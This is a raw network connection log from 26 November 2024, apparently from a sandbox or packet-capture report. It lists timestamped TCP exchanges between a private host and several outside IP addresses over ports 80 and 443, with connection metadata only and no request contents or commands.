Nov 26, 2024 00:25:47.884625912 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.884671926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.884857893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.884905100 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.885857105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.885869026 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.885900021 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.885924101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.886976004 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.887044907 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.887171984 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.887398958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.888235092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.888295889 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.888334990 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.888521910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.890698910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.890711069 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.890726089 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.890738010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.890748024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.890758038 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.890788078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.891949892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.891963005 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.891987085 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.892011881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.893352032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.893413067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.893486023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.893529892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.894171953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.894196987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.894212008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.894227028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.895150900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.895189047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.895397902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.895615101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.896684885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.896706104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.896744967 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.896781921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.897543907 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:47.897618055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:47.920264959 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.920897007 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.920909882 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:47.921511889 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:47.921518087 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.037491083 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.037561893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.037568092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.037607908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.038170099 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.038222075 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.038248062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.038389921 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.039259911 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.039300919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.039350986 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.039385080 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.040432930 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.040510893 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.040556908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.041594982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.041646004 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.041709900 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.041781902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.042778015 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.042826891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.042876959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.043071985 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.043951988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.044066906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.044069052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.044096947 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.045088053 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.045156002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.045211077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.045244932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.046369076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.046418905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.046446085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.046530962 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.047499895 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.047594070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.047646046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.048695087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.048748016 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.049204111 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.049329996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.049841881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.049887896 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.049905062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.050122976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.051023960 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.051060915 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.051333904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.051377058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.052145958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.052181959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.052241087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.052273035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.053375006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.053420067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.053438902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.053472042 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.054563999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.054615974 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.054697037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.054734945 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.055653095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.055713892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.055777073 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.055849075 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.056860924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.056921959 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.057410955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.057468891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.058109999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.058121920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.058160067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.058187008 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.059357882 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.059370995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.059400082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.059416056 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.060412884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.060451031 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.060529947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.060573101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.061573029 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.061661005 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.061692953 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.061739922 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.062927008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.062963009 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.062975883 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.063249111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.063926935 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.063977003 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.064109087 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.064148903 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.065186977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.065201044 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.065234900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.065251112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.066265106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.066324949 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.066396952 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.066497087 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.067615032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.067627907 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.067670107 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.067712069 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.068613052 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.068655014 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.068692923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.069268942 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.069324017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.069776058 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.069801092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.069817066 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.069860935 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.069878101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.069925070 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.070403099 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.070409060 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.072971106 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.072988987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.073009968 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.073023081 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.073055029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.073096037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.073298931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.073345900 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.073405027 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.073457956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.094968081 CET	49890	443	192.168.2.6	51.104.15.253
Nov 26, 2024 00:25:48.095001936 CET	443	49890	51.104.15.253	192.168.2.6
Nov 26, 2024 00:25:48.095360994 CET	49891	443	192.168.2.6	20.110.205.119
Nov 26, 2024 00:25:48.095365047 CET	49890	443	192.168.2.6	51.104.15.253
Nov 26, 2024 00:25:48.095400095 CET	443	49891	20.110.205.119	192.168.2.6
Nov 26, 2024 00:25:48.095448971 CET	49891	443	192.168.2.6	20.110.205.119
Nov 26, 2024 00:25:48.095742941 CET	49890	443	192.168.2.6	51.104.15.253
Nov 26, 2024 00:25:48.095755100 CET	443	49890	51.104.15.253	192.168.2.6
Nov 26, 2024 00:25:48.095758915 CET	49891	443	192.168.2.6	20.110.205.119
Nov 26, 2024 00:25:48.095781088 CET	443	49891	20.110.205.119	192.168.2.6
Nov 26, 2024 00:25:48.097296000 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.097461939 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.149005890 CET	49892	443	192.168.2.6	18.173.132.23
Nov 26, 2024 00:25:48.149072886 CET	443	49892	18.173.132.23	192.168.2.6
Nov 26, 2024 00:25:48.149133921 CET	49892	443	192.168.2.6	18.173.132.23
Nov 26, 2024 00:25:48.149364948 CET	49892	443	192.168.2.6	18.173.132.23
Nov 26, 2024 00:25:48.149383068 CET	443	49892	18.173.132.23	192.168.2.6
Nov 26, 2024 00:25:48.157094002 CET	49893	443	192.168.2.6	23.96.180.189
Nov 26, 2024 00:25:48.157139063 CET	443	49893	23.96.180.189	192.168.2.6
Nov 26, 2024 00:25:48.157187939 CET	49893	443	192.168.2.6	23.96.180.189
Nov 26, 2024 00:25:48.157493114 CET	49893	443	192.168.2.6	23.96.180.189
Nov 26, 2024 00:25:48.157502890 CET	443	49893	23.96.180.189	192.168.2.6
Nov 26, 2024 00:25:48.189681053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.236829042 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.236840963 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.237164021 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.237168074 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.310149908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.379801035 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.379884958 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.380115986 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.392489910 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.392489910 CET	49875	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.392518044 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.392528057 CET	443	49875	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.409338951 CET	49894	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.409382105 CET	443	49894	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.409477949 CET	49894	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.410123110 CET	49894	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.410135984 CET	443	49894	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.539510012 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.539592981 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.539652109 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.561163902 CET	49876	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.561187983 CET	443	49876	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.566276073 CET	49895	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.566337109 CET	443	49895	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.566736937 CET	49895	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.567014933 CET	49895	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:48.567025900 CET	443	49895	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:48.583925962 CET	443	49879	2.16.158.83	192.168.2.6
Nov 26, 2024 00:25:48.584017038 CET	49879	443	192.168.2.6	2.16.158.83
Nov 26, 2024 00:25:48.604274035 CET	443	49878	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.604366064 CET	49878	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.607508898 CET	49878	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.607517958 CET	443	49878	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.607848883 CET	49878	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.607856035 CET	443	49878	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.636513948 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.636589050 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.636657000 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.636787891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.637054920 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.637265921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.637310028 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.637315035 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.637351036 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.638408899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.638458014 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.638509035 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.638593912 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.639595985 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.639647961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.639754057 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.639801025 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.640732050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.640808105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.640904903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.641026020 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.641870975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.642076015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.733351946 CET	443	49881	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.733849049 CET	49881	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.733901024 CET	443	49881	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.734297991 CET	443	49881	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.734772921 CET	49881	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.734853029 CET	443	49881	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.735048056 CET	49881	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.738756895 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.738807917 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.738840103 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.738848925 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.738859892 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.738884926 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.738889933 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.738944054 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.739011049 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.739178896 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.744693041 CET	49877	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:48.744718075 CET	443	49877	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:48.761354923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.761395931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.761487961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.761924982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.761985064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.762051105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.762167931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.762689114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.762779951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.762820959 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.762897968 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.763856888 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.763937950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.763974905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.764035940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.765038013 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.765106916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.765120983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.765153885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.766258955 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.766316891 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.766525030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.766578913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.767404079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.767518997 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.767584085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.767674923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.768537998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.768603086 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.768641949 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.768683910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.769757032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.769830942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.769855022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.769927979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.770982981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.770996094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.771059036 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.772080898 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.772162914 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.772186995 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.772228003 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.773228884 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:48.773309946 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:48.775350094 CET	443	49881	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.795334101 CET	443	49880	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.795692921 CET	49880	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.795728922 CET	443	49880	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.796295881 CET	443	49880	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.797296047 CET	49880	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.797377110 CET	443	49880	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.797739029 CET	49880	443	192.168.2.6	13.107.246.40
Nov 26, 2024 00:25:48.839334011 CET	443	49880	13.107.246.40	192.168.2.6
Nov 26, 2024 00:25:48.850481033 CET	49879	443	192.168.2.6	2.16.158.83
Nov 26, 2024 00:25:48.850526094 CET	443	49879	2.16.158.83	192.168.2.6
Nov 26, 2024 00:25:48.850728989 CET	49879	443	192.168.2.6	2.16.158.83
Nov 26, 2024 00:25:48.850737095 CET	443	49879	2.16.158.83	192.168.2.6
Nov 26, 2024 00:25:48.851619959 CET	443	49879	2.16.158.83	192.168.2.6
Nov 26, 2024 00:25:48.851696968 CET	49879	443	192.168.2.6	2.16.158.83
Nov 26, 2024 00:25:48.878671885 CET	49896	443	192.168.2.6	104.117.182.56
Nov 26, 2024 00:25:48.878712893 CET	443	49896	104.117.182.56	192.168.2.6
